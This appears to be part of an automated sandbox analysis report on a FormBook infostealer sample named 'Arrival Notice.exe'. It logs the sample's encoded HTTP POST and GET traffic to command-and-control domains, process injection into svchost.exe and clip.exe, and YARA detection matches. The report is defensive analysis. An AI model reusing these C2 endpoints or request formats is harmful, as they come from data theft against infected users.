                Data Raw: 6c 48 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 37 6c 2f 32 47 70 41 55 34 73 54 41 75 68 36 59 41 37 77 46 6f 6e 4a 54 76 38 6f 59 51 47 65 36 58 43 4e 4e 6b 34 4e 58 4a 33 32 59 45 4b 4d 36 46 57 54 69 64 68 43 34 58 4d 64 47 76 2f 5a 77 37 68 6b 37 35 49 2f 4b 32 76 76 7a 45 65 59 46 42 35 6e 51 48 78 4b 50 6c 45 41 36 45 31 69 30 66 32 4e 66 48 69 53 49 71 44 59 58 38 63 69 4f 48 6a 2f 36 52 54 61 53 64 39 67 67 42 54 30 71 4f 39 56 4d 6d 73 31 39 66 64 4a 43 58 38 67 39 68 72 75 63 50 72 33 51 6f 75 6c 75 53 52 53 43 32 72 47 68 71 41 71 43 46 56 67 67 6c 37 78 72 47 6b 34 65 41 67 3d 3d
                Data Ascii: lH=+FKgbPBnyVok7l/2GpAU4sTAuh6YA7wFonJTv8oYQGe6XCNNk4NXJ32YEKM6FWTidhC4XMdGv/Zw7hk75I/K2vvzEeYFB5nQHxKPlEA6E1i0f2NfHiSIqDYX8ciOHj/6RTaSd9ggBT0qO9VMms19fdJCX8g9hrucPr3QouluSRSC2rGhqAqCFVggl7xrGk4eAg==
                Aug 19, 2024 04:29:18.367764950 CEST | 707 | IN | HTTP/1.1 405 Not Allowed
                date: Mon, 19 Aug 2024 02:29:18 GMT
                content-type: text/html
                content-length: 556
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                30 | 192.168.2.4 | 61904 | 91.195.240.19 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:29:20.267699957 CEST | 792 | OUT | POST /tf44/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.gipsytroya.com
                Origin: http://www.gipsytroya.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.gipsytroya.com/tf44/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 31 71 36 58 69 39 4e 6c 35 4e 58 4b 33 32 59 63 36 4d 46 4c 32 54 70 64 68 4f 77 58 4a 39 47 76 2f 39 77 37 6c 67 37 35 2f 44 4a 33 2f 76 39 64 4f 59 48 63 70 6e 51 48 78 4b 50 6c 45 6c 76 45 7a 4b 30 66 69 4a 66 57 32 47 4c 6d 6a 59 57 35 73 69 4f 57 7a 2f 2b 52 54 61 67 64 2f 46 46 42 52 38 71 4f 38 6c 4d 6e 39 31 2b 57 64 4a 45 61 63 68 4a 6f 5a 72 33 47 71 2b 61 6d 39 78 4b 64 69 2b 63 36 4e 58 37 37 78 4c 56 58 56 45 54 34 38 34 66 4c 6e 46 58 62 6b 76 46 64 6f 5a 2b 54 33 4d 4c 36 57 4d 37 49 30 70 49 4a 4a 77 3d
                Data Ascii: lH=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX1q6Xi9Nl5NXK32Yc6MFL2TpdhOwXJ9Gv/9w7lg75/DJ3/v9dOYHcpnQHxKPlElvEzK0fiJfW2GLmjYW5siOWz/+RTagd/FFBR8qO8lMn91+WdJEachJoZr3Gq+am9xKdi+c6NX77xLVXVET484fLnFXbkvFdoZ+T3ML6WM7I0pIJJw=
                Aug 19, 2024 04:29:20.919342041 CEST | 707 | IN | HTTP/1.1 405 Not Allowed
                date: Mon, 19 Aug 2024 02:29:20 GMT
                content-type: text/html
                content-length: 556
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                31 | 192.168.2.4 | 61905 | 91.195.240.19 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:29:22.832972050 CEST | 10874 | OUT | POST /tf44/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.gipsytroya.com
                Origin: http://www.gipsytroya.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.gipsytroya.com/tf44/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 30 53 36 58 78 31 4e 6b 61 56 58 4c 33 32 59 43 4b 4d 45 4c 32 54 30 64 6c 69 4b 58 4a 35 57 76 39 31 77 36 47 34 37 2f 4f 44 4a 2b 2f 76 39 41 65 59 47 42 35 6d 4b 48 77 36 31 6c 45 31 76 45 7a 4b 30 66 6a 35 66 57 69 53 4c 6b 6a 59 58 38 63 69 43 48 6a 2f 57 52 51 72 56 64 2f 42 2f 43 69 45 71 4f 63 31 4d 6c 50 74 2b 64 64 4a 47 4a 73 68 52 6f 59 58 6f 47 75 57 34 6d 38 31 30 64 68 69 63 72 4d 72 69 6d 54 44 42 4e 31 4e 4f 72 64 49 70 50 56 39 57 65 48 7a 46 51 64 46 59 47 57 77 64 30 32 39 7a 53 52 39 4a 63 4a 32 2b 37 41 38 69 6d 54 53 4a 6e 47 4d 59 56 30 2f 65 76 49 79 58 6d 37 6e 4d 54 39 6c 50 76 5a 39 65 5a 38 4c 75 4d 43 6d 59 36 4b 30 57 55 33 58 31 33 71 79 73 43 61 45 46 2f 34 76 59 78 72 41 49 64 59 31 6c 4f 56 52 48 31 4f 48 49 54 4c 44 34 61 4a 5a 6e 46 6b 4e 59 36 4a 52 73 63 52 67 71 6f 45 30 4b 48 41 77 36 6d 49 4c 31 47 6c 30 79 44 47 54 4b 76 56 67 [TRUNCATED]
                Data Ascii: lH= [TRUNCATED]
                Aug 19, 2024 04:29:23.470873117 CEST | 707 | IN | HTTP/1.1 405 Not Allowed
                date: Mon, 19 Aug 2024 02:29:23 GMT
                content-type: text/html
                content-length: 556
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                32 | 192.168.2.4 | 61906 | 91.195.240.19 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:29:25.373101950 CEST | 507 | OUT | GET /tf44/?lH=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.gipsytroya.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:29:26.072212934 CEST | 113 | IN | HTTP/1.1 439
                date: Mon, 19 Aug 2024 02:29:25 GMT
                content-length: 0
                server: Parking/1.0
                connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                33 | 192.168.2.4 | 61907 | 104.21.45.56 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:29:39.185808897 CEST | 769 | OUT | POST /lfkn/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.dmtxwuatbz.cc
                Origin: http://www.dmtxwuatbz.cc
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.dmtxwuatbz.cc/lfkn/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 48 55 48 78 52 38 59 45 36 38 77 4a 39 6f 58 65 47 77 6b 44 6e 52 69 4f 31 63 73 42 36 62 39 77 30 77 32 4e 35 37 46 30 41 63 67 51 67 52 6d 34 48 70 41 58 39 31 65 61 76 6d 4c 6c 2f 2b 50 42 66 75 45 39 51 5a 77 35 6a 43 42 32 76 7a 5a 30 6e 33 69 67 2f 79 66 76 61 43 37 4d 63 41 51 2b 7a 61 4e 4c 46 30 57 47 43 32 75 65 5a 44 76 58 77 71 6b 46 61 44 58 77 54 49 6b 4e 57 58 77 50 4d 35 48 6e 78 67 45 50 6c 44 2f 30 51 6a 74 72 35 34 79 44 7a 51 6a 6d 74 6d 37 50 4f 64 61 34 4f 77 70 6f 47 51 67 33 59 65 2f 37 2f 66 7a 54 32 5a 31 41 51 3d 3d
                Data Ascii: lH=tsf8FNiIpLuGJHUHxR8YE68wJ9oXeGwkDnRiO1csB6b9w0w2N57F0AcgQgRm4HpAX91eavmLl/+PBfuE9QZw5jCB2vzZ0n3ig/yfvaC7McAQ+zaNLF0WGC2ueZDvXwqkFaDXwTIkNWXwPM5HnxgEPlD/0Qjtr54yDzQjmtm7POda4OwpoGQg3Ye/7/fzT2Z1AQ==


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                34 | 192.168.2.4 | 61908 | 104.21.45.56 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:29:41.716414928 CEST | 789 | OUT | POST /lfkn/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.dmtxwuatbz.cc
                Origin: http://www.dmtxwuatbz.cc
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.dmtxwuatbz.cc/lfkn/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 76 39 77 56 41 32 4b 34 37 46 7a 41 63 67 59 41 52 76 38 48 70 39 58 39 78 67 61 74 43 4c 6c 2b 65 50 42 66 65 45 39 6e 4e 7a 34 7a 43 50 69 66 7a 66 77 6e 33 69 67 2f 79 66 76 61 47 46 4d 64 6f 51 69 53 71 4e 5a 55 30 56 61 79 32 68 49 4a 44 76 47 67 71 34 46 61 44 6c 77 58 41 43 4e 56 76 77 50 4f 78 48 6e 67 67 62 42 6c 44 35 71 67 69 76 69 35 64 51 42 44 5a 6f 6e 39 72 56 41 4d 4e 75 77 6f 68 7a 35 33 78 33 6c 59 36 4d 6d 34 57 48 65 31 6b 38 62 54 64 68 77 31 6a 70 2b 74 6f 76 4c 7a 44 76 79 2b 6e 43 43 62 6b 3d
                Data Ascii: lH=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAIv9wVA2K47FzAcgYARv8Hp9X9xgatCLl+ePBfeE9nNz4zCPifzfwn3ig/yfvaGFMdoQiSqNZU0Vay2hIJDvGgq4FaDlwXACNVvwPOxHnggbBlD5qgivi5dQBDZon9rVAMNuwohz53x3lY6Mm4WHe1k8bTdhw1jp+tovLzDvy+nCCbk=


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                35 | 192.168.2.4 | 61909 | 104.21.45.56 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:29:44.254338980 CEST | 10871 | OUT | POST /lfkn/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.dmtxwuatbz.cc
                Origin: http://www.dmtxwuatbz.cc
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.dmtxwuatbz.cc/lfkn/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 33 39 77 6e 49 32 4b 62 44 46 79 41 63 67 57 67 52 69 38 48 70 73 58 35 64 61 61 74 4f 62 6c 36 75 50 42 39 57 45 37 53 78 7a 32 7a 43 50 67 66 7a 61 30 6e 33 4e 67 2f 69 41 76 62 32 46 4d 64 6f 51 69 51 69 4e 61 46 30 56 4a 69 32 75 65 5a 44 7a 58 77 71 45 46 65 6d 51 77 58 4e 2f 4e 6b 50 77 50 75 68 48 6c 53 34 62 4a 6c 44 37 72 67 69 4e 69 35 68 6d 42 44 46 43 6e 2b 32 4f 41 4f 52 75 79 38 73 52 6c 7a 42 30 2f 4b 6d 76 6d 34 61 30 66 6d 45 36 58 45 56 48 2b 41 7a 76 68 65 49 57 44 78 7a 6b 33 4c 72 57 54 62 4a 75 77 70 38 33 5a 33 4e 4f 59 62 77 38 72 33 58 44 71 41 45 78 63 73 4e 6e 51 6d 55 76 59 72 47 39 39 53 47 6a 61 55 39 47 47 58 6e 34 65 4c 62 48 42 50 45 67 68 66 48 34 49 42 37 72 6b 61 78 57 33 6d 72 57 5a 57 69 2f 59 46 31 63 52 75 37 59 2f 62 4a 63 4a 68 79 46 62 54 5a 44 42 6e 2b 55 30 51 69 42 66 2f 52 76 62 58 61 75 34 50 4e 73 78 41 48 4a 54 30 42 [TRUNCATED]
                Data Ascii: lH= [TRUNCATED]


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                36 | 192.168.2.4 | 61910 | 104.21.45.56 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:29:46.794259071 CEST | 506 | OUT | GET /lfkn/?lH=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.dmtxwuatbz.cc
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                Target ID:0
                Start time:22:25:55
                Start date:18/08/2024
                Path:C:\Users\user\Desktop\Arrival Notice.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\Arrival Notice.exe"
                Imagebase:0x3b0000
                File size:1'287'680 bytes
                MD5 hash:F94FFBEA567A61ADE8409B8A854D6562
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:1
                Start time:22:25:56
                Start date:18/08/2024
                Path:C:\Windows\SysWOW64\svchost.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\Arrival Notice.exe"
                Imagebase:0x850000
                File size:46'504 bytes
                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:true

                Target ID:2
                Start time:22:26:09
                Start date:18/08/2024
                Path:C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe"
                Imagebase:0x980000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:false

                Target ID:3
                Start time:22:26:10
                Start date:18/08/2024
                Path:C:\Windows\SysWOW64\clip.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\SysWOW64\clip.exe"
                Imagebase:0x690000
                File size:24'576 bytes
                MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                Reputation:moderate
                Has exited:false

                Target ID:7
                Start time:22:26:23
                Start date:18/08/2024
                Path:C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe"
                Imagebase:0x980000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:8
                Start time:22:26:34
                Start date:18/08/2024
                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                Imagebase:0x7ff6bf500000
                File size:676'768 bytes
                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true


                  Execution Graph

                  Execution Coverage:3.3%
                  Dynamic/Decrypted Code Coverage:0.4%
                  Signature Coverage:4.9%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:55
                  execution_graph: text dump of the interactive execution-graph view (function-address nodes starting at entry node 402a00, per-node API-call counts, and caller->callee edges); the graph is only meaningful in the rendered report and is not reproduced here.
